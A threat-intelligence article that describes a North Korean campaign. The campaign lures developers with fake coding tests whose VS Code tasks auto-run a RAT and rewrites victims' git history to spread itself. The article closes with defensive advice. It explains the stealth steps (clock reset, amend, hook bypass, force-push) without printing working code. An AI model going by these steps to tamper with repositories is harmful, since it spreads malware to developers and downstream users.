Void Dokkaebi campaign: North Korea Targets Developers on GitHub

The global developer community is currently facing one of the most insidious cyber-threats in recent history. On April 28, 2026, cybersecurity researchers released comprehensive details on the Void Dokkaebi campaign, a sophisticated operation orchestrated by the North Korean state-sponsored group known as Famous Chollima. This campaign has effectively weaponized the very culture of open-source collaboration and the recruitment rituals of the tech industry. By blending psychological manipulation with technical ingenuity, Void Dokkaebi has moved beyond traditional spear-phishing into a new era of self-spreading supply-chain attacks that turn victims into unwitting distributors of malware.

The Anatomy of the Void Dokkaebi Campaign: A Cultural Exploit

The Void Dokkaebi campaign represents a masterclass in social engineering, specifically targeting the “geekiest” and most ambitious sectors of digital culture: AI and cryptocurrency development. The attack begins not with a malicious link in a cold email, but with a highly personalized recruitment pitch. Threat actors create synthetic identities—often utilizing AI-generated avatars and deepfake professional histories—to pose as recruiters from prestigious firms.

The hook is a “technical assessment” or “coding exam.” Developers, eager to prove their skills for a high-paying role in a burgeoning field, are invited to clone a repository from popular platforms like GitHub, GitLab, or Bitbucket. These repositories are not merely hosting malware; they are the starting point of a “Contagious Interview” pattern. Unlike previous iterations of this tactic, which relied on the victim manually running a compromised executable, the Void Dokkaebi campaign leverages the trust developers place in their integrated development environments (IDEs).

Technical Breakdown: The Visual Studio Code Trap

At the heart of this campaign lies a clever exploitation of Visual Studio Code (VS Code) configurations. When a developer clones the “technical exam” repository and opens it in VS Code, they are typically met with a standard prompt asking if they “Trust the authors of the files in this folder.” Because the request comes in the context of a job interview and a legitimate-looking codebase, most developers click “Yes” without a second thought. This single click triggers a chain of events that bypasses traditional security layers.

Automated Execution via tasks.json

The repositories contain a hidden .vscode/tasks.json file. This file is a legitimate VS Code feature designed to automate repetitive tasks like building or testing code. However, Void Dokkaebi has weaponized it by configuring tasks to run automatically upon the folder being opened. Researchers have identified several variants of these malicious configurations:

• The Downloader Variant: These tasks use PowerShell or curl to fetch a primary payload—often the DEV#POPPER Remote Access Trojan (RAT)—from a remote server or a blockchain transaction.
• The Disguised Asset Variant: In some cases, the payload is hidden within the repository itself as a fake image or font file. The tasks.json configuration executes a script that extracts and runs the malware from these binary blobs.

By March 2026, security analysts had identified over 500 unique malicious VS Code task configurations in the wild. The ingenuity of this method is that the malware never touches the developer’s email; it enters the system through a trusted git-clone command and executes through a trusted IDE.

The “Self-Spreading” Mechanism: Weaponizing Git History

The most alarming feature of the Void Dokkaebi campaign is its ability to “self-spread.” Once a developer’s machine is compromised, the attackers do not stop at stealing credentials or cryptocurrency keys. They deploy a specialized tool, often identified in repositories as temp_auto_push.bat, which targets the developer’s own professional repositories.

Git History Rewriting and Stealth Injection

The threat actors utilize a “commit tampering” tool that performs a surgical strike on the victim’s existing codebases. The process is as follows:

1. Malicious Code Injection: The tool injects heavily obfuscated JavaScript into configuration files such as tailwind.config.js, next.config.mjs, or postcss.config.mjs. To avoid detection during casual code reviews, the malicious code is often pushed to the far right edge of the editor using thousands of characters of whitespace.
2. Clock Restoration and Amendment: To maintain the illusion of legitimacy, the tool temporarily resets the system clock to match the timestamp of the developer’s previous legitimate commit. It then uses git commit --amend to fold the malicious injection into a historical commit.
3. Bypassing Security Hooks: The tool executes the commit using the --no-verify flag. This bypasses any pre-commit hooks or local linting tools that might otherwise flag the suspicious code.
4. Force-Pushing the Infection: Finally, the rewritten history is force-pushed to the remote repository. Because the history has been “cleaned,” other contributors to the project may not even see a new commit notification, yet they will receive the infected code the next time they pull from the branch.

This turns every compromised developer into a “Typhoid Mary” of the open-source world. As of today, researchers have identified over 750 repositories—including those belonging to major organizations like DataStax and Neutralinojs—that have carried these infection markers.

Payloads and Command-and-Control: The Blockchain Connection

The Void Dokkaebi campaign primarily delivers the DEV#POPPER RAT, a cross-platform tool written in Node.js. This malware is designed specifically for software workstations, featuring capabilities to exfiltrate browser data, grab cryptocurrency wallet files, and establish persistent reverse shells. What makes the C2 (Command and Control) infrastructure unique is its resilience against traditional takedowns.

Blockchain as a Dead Drop Resolver

Void Dokkaebi utilizes public blockchain networks—including Tron, Aptos, and the Binance Smart Chain—as a “dead drop” for their C2 instructions and secondary payloads. By embedding encrypted data within legitimate blockchain transactions, the threat actors ensure that even if their primary domains are seized, the malware can still “phone home” to retrieve new instructions. This decentralized approach makes the infrastructure nearly impossible for standard ISPs or security vendors to dismantle entirely.

Evasion of CI/CD and Sandboxes

The malware is surprisingly “aware” of its environment. It includes logic to detect if it is running in a Continuous Integration/Continuous Delivery (CI/CD) pipeline or a cloud-based sandbox. If such an environment is detected, the malware remains dormant. It specifically hunts for “real” developer workstations—machines with active user input, specific hardware signatures, and established development environments. This selectivity ensures that automated repository scanners frequently miss the malicious code, allowing it to persist in the supply chain for extended periods.

The Global Impact on Open-Source Trust

The scale of the Void Dokkaebi campaign has sent shockwaves through the tech industry. In late March and April 2026, the discovery of infected commits in popular libraries like Neutralinojs (which has over 8,000 GitHub stars) highlighted the extreme risk. In the case of Neutralinojs, the attackers force-pushed malicious commits across four repositories in a single automated burst, which went undetected for several days.

The campaign exploits the “trust-by-default” nature of the developer ecosystem. Developers frequently fork, clone, and contribute to hundreds of projects, often assuming that the reputation of the repository or the contributor provides a layer of safety. Void Dokkaebi proves that once a single developer is compromised through a fake job interview, that trust becomes a liability. The “worm-like” nature of the propagation means that a single successful social engineering attempt can potentially reach thousands of downstream users.

Defense and Mitigation: Securing the Development Workflow

Protecting against the Void Dokkaebi campaign requires a fundamental shift in how developers and organizations approach their local environments and recruitment processes. Security professionals are recommending the following high-priority defenses:

• Isolated Interview Environments: Developers should never clone or run code for a technical assessment on their primary workstation. Use disposable Virtual Machines (VMs), containers (like Docker), or cloud-based IDEs (like GitHub Codespaces) that are isolated from the local network and personal credentials.
• Audit VS Code Trust: Be extremely cautious when a new repository asks for “Workspace Trust.” Organizations should consider enforcing policies that disable automatic task execution (task.allowAutomaticTasks: false) in VS Code.
• Enforce Signed Commits: To prevent the “Git history-rewriting” tactic from going unnoticed, organizations should mandate GPG-signed commits. If an attacker attempts to amend a commit or rewrite history, the signature will be broken, providing an immediate red flag.
• Block Force Pushes: Repository administrators should enable branch protection rules that strictly forbid git push --force on main and development branches. This prevents the “silent” overwriting of history that Void Dokkaebi relies on for its stealthy propagation.
• Ignore .vscode Folders: Consider adding .vscode/ to the global .gitignore file to prevent accidental (or malicious) configuration files from being committed to the codebase.

Conclusion: The Future of Developer-Targeted Threats

The Void Dokkaebi campaign is a stark reminder that as security software becomes better at catching traditional malware, threat actors will move “up-stack” to target the humans who write the software. By weaponizing the tools and professional aspirations of the developer community, Famous Chollima has created a threat that is as much a psychological challenge as it is a technical one. In an era where “code is law,” the guardians of that code—the developers—are now the primary targets. Vigilance, isolation of environments, and a healthy skepticism of “dream job” recruiters are no longer optional; they are essential for the survival of the open-source ecosystem.